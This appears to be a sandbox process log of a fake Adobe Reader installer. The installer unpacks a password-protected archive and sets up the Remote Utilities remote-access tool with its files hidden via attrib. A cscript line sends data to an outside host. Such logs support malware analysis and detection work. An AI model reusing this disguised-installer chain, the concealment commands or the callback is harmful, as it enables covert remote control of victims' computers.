Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknownProcess created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknownProcess created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeProcess created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' CHAINERUIPROCESSID='3256Chainer' EXECUTEACTION='INSTALL' SECONDSEQUENCE='1' CLIENTPROCESSID='3256' ADDLOCAL='MainFeature,RequiredApplication' ACTION='INSTALL' CLIENTUILEVEL='0' PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' EXE_CMD_LINE='/exenoupdates /exelang 0 /noprereqs ' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' TARGETDIR='C:\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\HERBBL~1\AppData\Local\Temp\EXE21F6.tmp.bat' '
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\HERBBL~1\AppData\Local\Temp\EXE23CE.tmp.bat' '
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe'
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\inst_fold\waitbefore.bat' '
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exeProcess created: C:\inst_fold\7zaa.exe 'C:\inst_fold\7zaa.exe' x -oC:\inst_fold -pdsiSDJJiojeflOSIOwp3#DSIJ23jeewE@_SDD_as2 C:\inst_fold\arm.7z
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exeProcess created: C:\inst_fold\fp.exe 'C:\inst_fold\fp.exe'
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' AI_RESUME=1 ADDLOCAL=MainFeature,RequiredApplication PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' TARGETDIR='C:\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeProcess created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' CHAINERUIPROCESSID='2404Chainer' EXECUTEACTION='INSTALL' SECONDSEQUENCE='1' CLIENTPROCESSID='2404' ADDLOCAL='MainFeature,RequiredApplication' ACTION='INSTALL' CLIENTUILEVEL='0' PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' AI_RESUME='1' TARGETDIR='C:\' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I /C '7zaa.exe'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I /C 'armstall.exe'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I /C 'rutserv.exe'
Source: C:\inst_fold\fp.exeProcess created: C:\inst_fold\armstart.exe 'C:\inst_fold\armstart.exe'
Source: C:\inst_fold\fp.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\inst_fold\armgrd.bat' '
Source: C:\inst_fold\fp.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\inst_fold\armsettings.bat' '
Source: C:\inst_fold\fp.exeProcess created: C:\inst_fold\armforce.exe 'C:\inst_fold\armforce.exe' C:\inst_fold\armstatus.bat
Source: C:\inst_fold\fp.exeProcess created: C:\inst_fold\armstatus.exe 'C:\inst_fold\armstatus.exe' 1 C:\inst_fold\armdaemon.js
Source: C:\inst_fold\armstart.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exe 'C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exe' /rsetup
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript /nologo C:\inst_fold\armdaemon.js 'http://ca80628.tmweb.ru/f.php?data=000-000-000-000&id_k=1'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host\*.*'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
